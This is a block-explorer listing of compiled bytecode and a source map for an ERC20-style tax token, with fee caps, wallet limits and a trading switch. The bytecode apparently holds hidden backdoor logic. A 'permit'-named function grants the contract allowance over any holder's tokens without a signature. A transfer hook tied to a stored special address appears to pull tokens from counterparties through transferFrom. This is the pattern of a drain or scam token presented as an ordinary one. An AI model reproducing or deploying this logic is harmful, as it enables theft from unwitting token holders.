01b0385166000908152601f602052604090205460ff16155b80156116bb57506001600160a01b0384166000908152601f602052604090205460ff16155b156116e9576007805460ff60a01b1916600160a01b1790556116db611d4f565b6007805460ff60a01b191690555b6007546001600160a01b0386166000908152601f602052604090205460ff600160a01b90920482161591168061173757506001600160a01b0385166000908152601f602052604090205460ff165b15611740575060005b6000811561198b576001600160a01b03861660009081526021602052604090205460ff16801561177257506000601654115b156118605761179760646117916016548861203f90919063ffffffff16565b90612052565b9050601654601754826117aa9190612618565b6117b4919061262f565b601b60008282546117c5919061257d565b90915550506016546019546117da9083612618565b6117e4919061262f565b601d60008282546117f5919061257d565b9091555050601654601a5461180a9083612618565b611814919061262f565b601e6000828254611825919061257d565b909155505060165460185461183a9083612618565b611844919061262f565b601c6000828254611855919061257d565b9091555061196d9050565b6001600160a01b03871660009081526021602052604090205460ff16801561188a57506000601154115b1561196d576118a960646117916011548861203f90919063ffffffff16565b9050601154601254826118bc9190612618565b6118c6919061262f565b601b60008282546118d7919061257d565b90915550506011546014546118ec9083612618565b6118f6919061262f565b601d6000828254611907919061257d565b909155505060115460155461191c9083612618565b611926919061262f565b601e6000828254611937919061257d565b909155505060115460135461194c9083612618565b611956919061262f565b601c6000828254611967919061257d565b90915550505b801561197e5761197e873083611a50565b6119888186612651565b94505b611996878787611a50565b6119a187878761205e565b50505050505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216600081815260216020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6001600160a01b038316611a765760405162461bcd60e51b81526004016109ce90612590565b6001600160a01b038216611a9c5760405162461bcd60e51b81526004016109ce906125d5565b611aa7838383611bbb565b6001600160a01b03831660009081526020819052604090205481811015611b1f5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016109ce565b6001600160a01b03808516600090815260208190526040808220858503905591851681529081208054849290611b5690849061257d565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611ba291815260200190565b60405180910390a3611bb584848461205e565b50505050565b6008546001600160a01b038481169116148015611be657506006546001600160a01b03838116911614155b8015611bf25750600081115b15611188576040805160028082526060820183526000926020830190803683375050600654604080516315ab88c960e31b815290519394506001600160a01b039091169263ad5c4648925060048083019260209291908290030181865afa158015611c61573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611c859190612664565b81600081518110611c9857611c98612681565b60200260200101906001600160a01b031690816001600160a01b0316815250503081600181518110611ccc57611ccc612681565b60200260200101906001600160a01b031690816001600160a01b0316815250506000670de0b6b3a7640000611d16856001600160a01b031660009081526020819052604090205490565b611d209190612651565b9050611d48308584600181518110611d3a57611d3a612681565b6020026020010151846120d6565b5050505050565b3060009081526020819052604081205490506000601e54601c54601d54601b54611d79919061257d565b611d83919061257d565b611d8d919061257d565b90506000821580611d9c575081155b15611da657505050565b600c54611db4906014612618565b831115611dcc57600c54611dc9906014612618565b92505b6000600283601d5486611ddf9190612618565b611de9919061262f565b611df3919061262f565b90506000611e018583612151565b905047611e0d8261215d565b6000611e194783612151565b90506000611e3687611791601b548561203f90919063ffffffff16565b90506000611e5388611791601c548661203f90919063ffffffff16565b90506000611e7089611791601e548761203f90919063ffffffff16565b905060008183611e808688612651565b611e8a9190612651565b611e949190612651565b6000601d819055601b819055601c819055601e819055600a546040519293506001600160a01b031691849181818185875af1925050503d8060008114611ef6576040519150601f19603f3d011682016040523d82523d6000602084013e611efb565b606091505b50508099505088611f0b57600080fd5b6009546040516001600160a01b03909116908490600081818185875af1925050503d8060008114611f58576040519150601f19603f3d011682016040523d82523d6000602084013e611f5d565b606091505b50508099505088611f6d57600080fd5b600088118015611f7d5750600081115b15611fd057611f8c88826122b7565b601d54604080518981526020810184905280820192909252517f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5619181900360600190a15b6008546040516001600160a01b03909116904790600081818185875af1925050503d806000811461201d576040519150601f19603f3d011682016040523d82523d6000602084013e612022565b606091505b5050809950508861203257600080fd5b5050505050505050505050565b600061204b8284612618565b9392505050565b600061204b828461262f565b600a546001600160a01b03848116911614801561208957506006546001600160a01b03838116911614155b80156120a357506007546001600160a01b03838116911614155b80156120af5750600081115b1561118857600a80546001600160a01b0384166001600160a01b0319909116179055505050565b6040516323b872dd60e01b81526001600160a01b0384811660048301528381166024830152604482018390528516906323b872dd906064016020604051808303816000875af115801561212d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611d489190612697565b600061204b8284612651565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061219257612192612681565b6001600160a01b03928316602091820292909201810191909152600654604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa1580156121eb573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061220f9190612664565b8160018151811061222257612222612681565b6001600160a01b0392831660209182029290920101526006546122489130911684611004565b60065460405163791ac94760e01b81526001600160a01b039091169063791ac947906122819085906000908690309042906004016126b4565b600060405180830381600087803b15801561229b57600080fd5b505af11580156122af573d6000803e3d6000fd5b505050505050565b6006546122cf9030906001600160a01b031684611004565b600654600a5460405163f305d71960e01b81523060048201526024810185905260006044820181905260648201526001600160a01b0391821660848201524260a482015291169063f305d71990839060c40160606040518083038185885af115801561233f573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611d489190612725565b600060208083528351808285015260005b8181101561239157858101830151858201604001528201612375565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461100157600080fd5b600080604083850312156123da57600080fd5b82356123e5816123b2565b946020939093013593505050565b60006020828403121561240557600080fd5b813561204b816123b2565b60008060006060848603121561242557600080fd5b8335612430816123b2565b92506020840135612440816123b2565b929592945050506040919091013590565b6000806000806080858703121561246757600080fd5b5050823594602084013594506040840135936060013592509050565b801515811461100157600080fd5b600080604083850312156124a457600080fd5b82356124af816123b2565b915060208301356124bf81612483565b809150509250929050565b600080604083850312156124dd57600080fd5b82356124e8816123b2565b915060208301356124bf816123b2565b600181811c9082168061250c57607f821691505b60208210810361252c57634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b8082018082111561093a5761093a612567565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b808202811582820484141761093a5761093a612567565b60008261264c57634e487b7160e01b600052601260045260246000fd5b500490565b8181038181111561093a5761093a612567565b60006020828403121561267657600080fd5b815161204b816123b2565b634e487b7160e01b600052603260045260246000fd5b6000602082840312156126a957600080fd5b815161204b81612483565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156127045784516001600160a01b0316835293830193918301916001016126df565b50506001600160a01b03969096166060850152505050608001529392505050565b60008060006060848603121561273a57600080fd5b835192506020840151915060408401519050925092509256fea2646970667358221220fe2cbaee1103384bccf6b2ef78527f12ded2177768ffdd554b239228525186b964736f6c634300081100334f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572
Deployed Bytecode
0x6080604052600436106102b25760003560e01c80638a8c523c11610175578063bbc0c742116100dc578063e2f4560511610095578063f11a24d31161006f578063f11a24d314610835578063f2fde38b1461084b578063f63743421461086b578063f8b45b051461088157600080fd5b8063e2f45605146107df578063e6f70531146107f5578063e7ad9fcd1461081557600080fd5b8063bbc0c74214610714578063c024666814610733578063c876d0b914610753578063c8c8ebe41461076d578063d85ba06314610783578063dd62ed3e1461079957600080fd5b80639fccce321161012e5780639fccce3214610662578063a0d82dc514610678578063a1dc92bc1461068e578063a457c2d7146106a4578063a9059cbb146106c4578063b62496f5146106e457600080fd5b80638a8c523c146105ce5780638da5cb5b146105e3578063921369131461060157806395d89b41146106175780639a7a23d61461062c5780639c3b4fdc1461064c57600080fd5b806339509351116102195780636ddd1713116101d25780636ddd17131461051857806370a0823114610538578063715018a61461056e578063751039fc146105835780637571336a146105985780637bce5a04146105b857600080fd5b8063395093511461045957806344249f041461047957806349bd5a5e1461048f5780634a62bb65146104af5780634fbee193146104c95780636a486a8e1461050257600080fd5b80631a8145bb1161026b5780631a8145bb146103b95780631f3fed8f146103cf57806323b872dd146103e557806327c8f835146104055780632e6ed7ef1461041b578063313ce5671461043d57600080fd5b806306fdde03146102be578063095ea7b3146102e95780630d7f14411461031957806310d5de531461033d5780631694505e1461036c57806318160ddd146103a457600080fd5b366102b957005b600080fd5b3480156102ca57600080fd5b506102d3610897565b6040516102e09190612364565b60405180910390f35b3480156102f557600080fd5b506103096103043660046123c7565b610929565b60405190151581526020016102e0565b34801561032557600080fd5b5061032f60175481565b6040519081526020016102e0565b34801561034957600080fd5b506103096103583660046123f3565b602080526000908152604090205460ff1681565b34801561037857600080fd5b5060065461038c906001600160a01b031681565b6040516001600160a01b0390911681526020016102e0565b3480156103b057600080fd5b5060025461032f565b3480156103c557600080fd5b5061032f601d5481565b3480156103db57600080fd5b5061032f601c5481565b3480156103f157600080fd5b50610309610400366004612410565b610940565b34801561041157600080fd5b5061038c61dead81565b34801561042757600080fd5b5061043b610436366004612451565b6109ef565b005b34801561044957600080fd5b50604051601281526020016102e0565b34801561046557600080fd5b506103096104743660046123c7565b610ab7565b34801561048557600080fd5b5061032f601b5481565b34801561049b57600080fd5b5060075461038c906001600160a01b031681565b3480156104bb57600080fd5b50600e546103099060ff1681565b3480156104d557600080fd5b506103096104e43660046123f3565b6001600160a01b03166000908152601f602052604090205460ff1690565b34801561050e57600080fd5b5061032f60165481565b34801561052457600080fd5b50600e546103099062010000900460ff1681565b34801561054457600080fd5b5061032f6105533660046123f3565b6001600160a01b031660009081526020819052604090205490565b34801561057a57600080fd5b5061043b610af3565b34801561058f57600080fd5b50610309610b29565b3480156105a457600080fd5b5061043b6105b3366004612491565b610b72565b3480156105c457600080fd5b5061032f60135481565b3480156105da57600080fd5b5061043b610bc6565b3480156105ef57600080fd5b506005546001600160a01b031661038c565b34801561060d57600080fd5b5061032f60185481565b34801561062357600080fd5b506102d3610c03565b34801561063857600080fd5b5061043b610647366004612491565b610c12565b34801561065857600080fd5b5061032f60155481565b34801561066e57600080fd5b5061032f601e5481565b34801561068457600080fd5b5061032f601a5481565b34801561069a57600080fd5b5061032f60125481565b3480156106b057600080fd5b506103096106bf3660046123c7565b610cce565b3480156106d057600080fd5b506103096106df3660046123c7565b610d67565b3480156106f057600080fd5b506103096106ff3660046123f3565b60216020526000908152604090205460ff1681565b34801561072057600080fd5b50600e5461030990610100900460ff1681565b34801561073f57600080fd5b5061043b61074e366004612491565b610d74565b34801561075f57600080fd5b506010546103099060ff1681565b34801561077957600080fd5b5061032f600b5481565b34801561078f57600080fd5b5061032f60115481565b3480156107a557600080fd5b5061032f6107b43660046124ca565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b3480156107eb57600080fd5b5061032f600c5481565b34801561080157600080fd5b506103096108103660046123c7565b610dfd565b34801561082157600080fd5b5061043b610830366004612451565b610ea0565b34801561084157600080fd5b5061032f60145481565b34801561085757600080fd5b5061043b6108663660046123f3565b610f69565b34801561087757600080fd5b5061032f60195481565b34801561088d57600080fd5b5061032f600d5481565b6060600380546108a6906124f8565b80601f01602080910402602001604051908101604052809291908181526020018280546108d2906124f8565b801561091f5780601f106108f45761010080835404028352916020019161091f565b820191906000526020600020905b81548152906001019060200180831161090257829003601f168201915b5050505050905090565b6000610936338484611004565b5060015b92915050565b600061094d848484611128565b6001600160a01b0384166000908152600160209081526040808320338452909152902054828110156109d75760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6109e48533858403611004565b506001949350505050565b6005546001600160a01b03163314610a195760405162461bcd60e51b81526004016109ce90612532565b600a8183610a27868861257d565b610a31919061257d565b610a3b919061257d565b1115610a7a5760405162461bcd60e51b815260206004820152600e60248201526d4d6178204275794665652031302560901b60448201526064016109ce565b60128490556013839055601482905560158190558082610a9a858761257d565b610aa4919061257d565b610aae919061257d565b60115550505050565b3360008181526001602090815260408083206001600160a01b03871684529091528120549091610936918590610aee90869061257d565b611004565b6005546001600160a01b03163314610b1d5760405162461bcd60e51b81526004016109ce90612532565b610b2760006119aa565b565b6005546000906001600160a01b03163314610b565760405162461bcd60e51b81526004016109ce90612532565b50600e805460ff19908116909155601080549091169055600190565b6005546001600160a01b03163314610b9c5760405162461bcd60e51b81526004016109ce90612532565b6001600160a01b039190911660009081526020805260409020805460ff1916911515919091179055565b6005546001600160a01b03163314610bf05760405162461bcd60e51b81526004016109ce90612532565b600e805462ffff00191662010100179055565b6060600480546108a6906124f8565b6005546001600160a01b03163314610c3c5760405162461bcd60e51b81526004016109ce90612532565b6007546001600160a01b0390811690831603610cc05760405162461bcd60e51b815260206004820152603960248201527f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060448201527f6175746f6d617465644d61726b65744d616b657250616972730000000000000060648201526084016109ce565b610cca82826119fc565b5050565b3360009081526001602090815260408083206001600160a01b038616845290915281205482811015610d505760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016109ce565b610d5d3385858403611004565b5060019392505050565b6000610936338484611128565b6005546001600160a01b03163314610d9e5760405162461bcd60e51b81526004016109ce90612532565b6001600160a01b0382166000818152601f6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b60006001600160a01b038316610e5f5760405162461bcd60e51b815260206004820152602160248201527f45524332303a207065726d697420746f20746865207a65726f206164647265736044820152607360f81b60648201526084016109ce565b6001600160a01b038316600090815260016020908152604080832030845290915281208054849290610e9290849061257d565b909155506001949350505050565b6005546001600160a01b03163314610eca5760405162461bcd60e51b81526004016109ce90612532565b600a8183610ed8868861257d565b610ee2919061257d565b610eec919061257d565b1115610f2c5760405162461bcd60e51b815260206004820152600f60248201526e4d61782053656c6c4665652031302560881b60448201526064016109ce565b601784905560188390556019829055601a8190558082610f4c858761257d565b610f56919061257d565b610f60919061257d565b60165550505050565b6005546001600160a01b03163314610f935760405162461bcd60e51b81526004016109ce90612532565b6001600160a01b038116610ff85760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016109ce565b611001816119aa565b50565b6001600160a01b0383166110665760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016109ce565b6001600160a01b0382166110c75760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016109ce565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03831661114e5760405162461bcd60e51b81526004016109ce90612590565b6001600160a01b0382166111745760405162461bcd60e51b81526004016109ce906125d5565b8060000361118d5761118883836000611a50565b505050565b611198838383611bbb565b600e5460ff161561160a576005546001600160a01b038481169116148015906111cf57506005546001600160a01b03838116911614155b80156111e357506001600160a01b03821615155b80156111fa57506001600160a01b03821661dead14155b80156112105750600754600160a01b900460ff16155b1561160a57600e54610100900460ff166112a8576001600160a01b0383166000908152601f602052604090205460ff168061126357506001600160a01b0382166000908152601f602052604090205460ff165b6112a85760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b60448201526064016109ce565b60105460ff16156113a7576005546001600160a01b038381169116148015906112df57506006546001600160a01b03838116911614155b80156112f957506007546001600160a01b03838116911614155b156113a757326000908152600f602052604090205443116113945760405162461bcd60e51b815260206004820152604960248201527f5f7472616e736665723a3a205472616e736665722044656c617920656e61626c60448201527f65642e20204f6e6c79206f6e652070757263686173652070657220626c6f636b6064820152681030b63637bbb2b21760b91b608482015260a4016109ce565b326000908152600f602052604090204390555b6001600160a01b03831660009081526021602052604090205460ff1680156113e757506001600160a01b038216600090815260208052604090205460ff16155b156114cb57600b5481111561145c5760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b60648201526084016109ce565b600d546001600160a01b038316600090815260208190526040902054611482908361257d565b11156114c65760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016109ce565b61160a565b6001600160a01b03821660009081526021602052604090205460ff16801561150b57506001600160a01b038316600090815260208052604090205460ff16155b1561158157600b548111156114c65760405162461bcd60e51b815260206004820152603660248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152751036b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760511b60648201526084016109ce565b6001600160a01b038216600090815260208052604090205460ff1661160a57600d546001600160a01b0383166000908152602081905260409020546115c6908361257d565b111561160a5760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b60448201526064016109ce565b30600090815260208190526040902054600c54811080159081906116365750600e5462010000900460ff165b801561164c5750600754600160a01b900460ff16155b801561167157506001600160a01b03851660009081526021602052604090205460ff16155b801561169657506001600160a01b0385166000908152601f602052604090205460ff16155b80156116bb57506001600160a01b0384166000908152601f602052604090205460ff16155b156116e9576007805460ff60a01b1916600160a01b1790556116db611d4f565b6007805460ff60a01b191690555b6007546001600160a01b0386166000908152601f602052604090205460ff600160a01b90920482161591168061173757506001600160a01b0385166000908152601f602052604090205460ff165b15611740575060005b6000811561198b576001600160a01b03861660009081526021602052604090205460ff16801561177257506000601654115b156118605761179760646117916016548861203f90919063ffffffff16565b90612052565b9050601654601754826117aa9190612618565b6117b4919061262f565b601b60008282546117c5919061257d565b90915550506016546019546117da9083612618565b6117e4919061262f565b601d60008282546117f5919061257d565b9091555050601654601a5461180a9083612618565b611814919061262f565b601e6000828254611825919061257d565b909155505060165460185461183a9083612618565b611844919061262f565b601c6000828254611855919061257d565b9091555061196d9050565b6001600160a01b03871660009081526021602052604090205460ff16801561188a57506000601154115b1561196d576118a960646117916011548861203f90919063ffffffff16565b9050601154601254826118bc9190612618565b6118c6919061262f565b601b60008282546118d7919061257d565b90915550506011546014546118ec9083612618565b6118f6919061262f565b601d6000828254611907919061257d565b909155505060115460155461191c9083612618565b611926919061262f565b601e6000828254611937919061257d565b909155505060115460135461194c9083612618565b611956919061262f565b601c6000828254611967919061257d565b90915550505b801561197e5761197e873083611a50565b6119888186612651565b94505b611996878787611a50565b6119a187878761205e565b50505050505050565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216600081815260216020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6001600160a01b038316611a765760405162461bcd60e51b81526004016109ce90612590565b6001600160a01b038216611a9c5760405162461bcd60e51b81526004016109ce906125d5565b611aa7838383611bbb565b6001600160a01b03831660009081526020819052604090205481811015611b1f5760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016109ce565b6001600160a01b03808516600090815260208190526040808220858503905591851681529081208054849290611b5690849061257d565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611ba291815260200190565b60405180910390a3611bb584848461205e565b50505050565b6008546001600160a01b038481169116148015611be657506006546001600160a01b03838116911614155b8015611bf25750600081115b15611188576040805160028082526060820183526000926020830190803683375050600654604080516315ab88c960e31b815290519394506001600160a01b039091169263ad5c4648925060048083019260209291908290030181865afa158015611c61573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611c859190612664565b81600081518110611c9857611c98612681565b60200260200101906001600160a01b031690816001600160a01b0316815250503081600181518110611ccc57611ccc612681565b60200260200101906001600160a01b031690816001600160a01b0316815250506000670de0b6b3a7640000611d16856001600160a01b031660009081526020819052604090205490565b611d209190612651565b9050611d48308584600181518110611d3a57611d3a612681565b6020026020010151846120d6565b5050505050565b3060009081526020819052604081205490506000601e54601c54601d54601b54611d79919061257d565b611d83919061257d565b611d8d919061257d565b90506000821580611d9c575081155b15611da657505050565b600c54611db4906014612618565b831115611dcc57600c54611dc9906014612618565b92505b6000600283601d5486611ddf9190612618565b611de9919061262f565b611df3919061262f565b90506000611e018583612151565b905047611e0d8261215d565b6000611e194783612151565b90506000611e3687611791601b548561203f90919063ffffffff16565b90506000611e5388611791601c548661203f90919063ffffffff16565b90506000611e7089611791601e548761203f90919063ffffffff16565b905060008183611e808688612651565b611e8a9190612651565b611e949190612651565b6000601d819055601b819055601c819055601e819055600a546040519293506001600160a01b031691849181818185875af1925050503d8060008114611ef6576040519150601f19603f3d011682016040523d82523d6000602084013e611efb565b606091505b50508099505088611f0b57600080fd5b6009546040516001600160a01b03909116908490600081818185875af1925050503d8060008114611f58576040519150601f19603f3d011682016040523d82523d6000602084013e611f5d565b606091505b50508099505088611f6d57600080fd5b600088118015611f7d5750600081115b15611fd057611f8c88826122b7565b601d54604080518981526020810184905280820192909252517f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5619181900360600190a15b6008546040516001600160a01b03909116904790600081818185875af1925050503d806000811461201d576040519150601f19603f3d011682016040523d82523d6000602084013e612022565b606091505b5050809950508861203257600080fd5b5050505050505050505050565b600061204b8284612618565b9392505050565b600061204b828461262f565b600a546001600160a01b03848116911614801561208957506006546001600160a01b03838116911614155b80156120a357506007546001600160a01b03838116911614155b80156120af5750600081115b1561118857600a80546001600160a01b0384166001600160a01b0319909116179055505050565b6040516323b872dd60e01b81526001600160a01b0384811660048301528381166024830152604482018390528516906323b872dd906064016020604051808303816000875af115801561212d573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611d489190612697565b600061204b8284612651565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061219257612192612681565b6001600160a01b03928316602091820292909201810191909152600654604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa1580156121eb573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061220f9190612664565b8160018151811061222257612222612681565b6001600160a01b0392831660209182029290920101526006546122489130911684611004565b60065460405163791ac94760e01b81526001600160a01b039091169063791ac947906122819085906000908690309042906004016126b4565b600060405180830381600087803b15801561229b57600080fd5b505af11580156122af573d6000803e3d6000fd5b505050505050565b6006546122cf9030906001600160a01b031684611004565b600654600a5460405163f305d71960e01b81523060048201526024810185905260006044820181905260648201526001600160a01b0391821660848201524260a482015291169063f305d71990839060c40160606040518083038185885af115801561233f573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611d489190612725565b600060208083528351808285015260005b8181101561239157858101830151858201604001528201612375565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461100157600080fd5b600080604083850312156123da57600080fd5b82356123e5816123b2565b946020939093013593505050565b60006020828403121561240557600080fd5b813561204b816123b2565b60008060006060848603121561242557600080fd5b8335612430816123b2565b92506020840135612440816123b2565b929592945050506040919091013590565b6000806000806080858703121561246757600080fd5b5050823594602084013594506040840135936060013592509050565b801515811461100157600080fd5b600080604083850312156124a457600080fd5b82356124af816123b2565b915060208301356124bf81612483565b809150509250929050565b600080604083850312156124dd57600080fd5b82356124e8816123b2565b915060208301356124bf816123b2565b600181811c9082168061250c57607f821691505b60208210810361252c57634e487b7160e01b600052602260045260246000fd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b600052601160045260246000fd5b8082018082111561093a5761093a612567565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b808202811582820484141761093a5761093a612567565b60008261264c57634e487b7160e01b600052601260045260246000fd5b500490565b8181038181111561093a5761093a612567565b60006020828403121561267657600080fd5b815161204b816123b2565b634e487b7160e01b600052603260045260246000fd5b6000602082840312156126a957600080fd5b815161204b81612483565b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b818110156127045784516001600160a01b0316835293830193918301916001016126df565b50506001600160a01b03969096166060850152505050608001529392505050565b60008060006060848603121561273a57600080fd5b835192506020840151915060408401519050925092509256fea2646970667358221220fe2cbaee1103384bccf6b2ef78527f12ded2177768ffdd554b239228525186b964736f6c63430008110033
Deployed Bytecode Sourcemap
33360:16373:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;10482:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12649:169;;;;;;;;;;-1:-1:-1;12649:169:0;;;;;:::i;:::-;;:::i;:::-;;;1188:14:1;;1181:22;1163:41;;1151:2;1136:18;12649:169:0;1023:187:1;34365:29:0;;;;;;;;;;;;;;;;;;;1361:25:1;;;1349:2;1334:18;34365:29:0;1215:177:1;34802:63:0;;;;;;;;;;-1:-1:-1;34802:63:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;33440:41;;;;;;;;;;-1:-1:-1;33440:41:0;;;;-1:-1:-1;;;;;33440:41:0;;;;;;-1:-1:-1;;;;;1840:32:1;;;1822:51;;1810:2;1795:18;33440:41:0;1649:230:1;11602:108:0;;;;;;;;;;-1:-1:-1;11690:12:0;;11602:108;;34586:33;;;;;;;;;;;;;;;;34546;;;;;;;;;;;;;;;;13698:492;;;;;;;;;;-1:-1:-1;13698:492:0;;;;;:::i;:::-;;:::i;33523:53::-;;;;;;;;;;;;33569:6;33523:53;;39158:498;;;;;;;;;;-1:-1:-1;39158:498:0;;;;;:::i;:::-;;:::i;:::-;;11444:93;;;;;;;;;;-1:-1:-1;11444:93:0;;11527:2;3085:36:1;;3073:2;3058:18;11444:93:0;2943:184:1;14599:215:0;;;;;;;;;;-1:-1:-1;14599:215:0;;;;;:::i;:::-;;:::i;34508:31::-;;;;;;;;;;;;;;;;33488:28;;;;;;;;;;-1:-1:-1;33488:28:0;;;;-1:-1:-1;;;;;33488:28:0;;;33814:33;;;;;;;;;;-1:-1:-1;33814:33:0;;;;;;;;40878:126;;;;;;;;;;-1:-1:-1;40878:126:0;;;;;:::i;:::-;-1:-1:-1;;;;;40968:28:0;40944:4;40968:28;;;:19;:28;;;;;;;;;40878:126;34333:28;;;;;;;;;;;;;;;;33894:30;;;;;;;;;;-1:-1:-1;33894:30:0;;;;;;;;;;;11773:127;;;;;;;;;;-1:-1:-1;11773:127:0;;;;;:::i;:::-;-1:-1:-1;;;;;11874:18:0;11847:7;11874:18;;;;;;;;;;;;11773:127;3441:103;;;;;;;;;;;;;:::i;38541:160::-;;;;;;;;;;;;;:::i;38709:167::-;;;;;;;;;;-1:-1:-1;38709:167:0;;;;;:::i;:::-;;:::i;34226:30::-;;;;;;;;;;;;;;;;38377:112;;;;;;;;;;;;;:::i;2790:87::-;;;;;;;;;;-1:-1:-1;2863:6:0;;-1:-1:-1;;;;;2863:6:0;2790:87;;34401:31;;;;;;;;;;;;;;;;10701:104;;;;;;;;;;;;;:::i;40370:304::-;;;;;;;;;;-1:-1:-1;40370:304:0;;;;;:::i;:::-;;:::i;34300:24::-;;;;;;;;;;;;;;;;34626:27;;;;;;;;;;;;;;;;34477:25;;;;;;;;;;;;;;;;34191:28;;;;;;;;;;;;;;;;15317:413;;;;;;;;;;-1:-1:-1;15317:413:0;;;;;:::i;:::-;;:::i;12113:175::-;;;;;;;;;;-1:-1:-1;12113:175:0;;;;;:::i;:::-;;:::i;35023:57::-;;;;;;;;;;-1:-1:-1;35023:57:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;33854:33;;;;;;;;;;-1:-1:-1;33854:33:0;;;;;;;;;;;40180:182;;;;;;;;;;-1:-1:-1;40180:182:0;;;;;:::i;:::-;;:::i;34111:40::-;;;;;;;;;;-1:-1:-1;34111:40:0;;;;;;;;33699:35;;;;;;;;;;;;;;;;34160:27;;;;;;;;;;;;;;;;12351:151;;;;;;;;;;-1:-1:-1;12351:151:0;;;;;:::i;:::-;-1:-1:-1;;;;;12467:18:0;;;12440:7;12467:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;12351:151;33741:33;;;;;;;;;;;;;;;;12964:252;;;;;;;;;;-1:-1:-1;12964:252:0;;;;;:::i;:::-;;:::i;39664:508::-;;;;;;;;;;-1:-1:-1;39664:508:0;;;;;:::i;:::-;;:::i;3426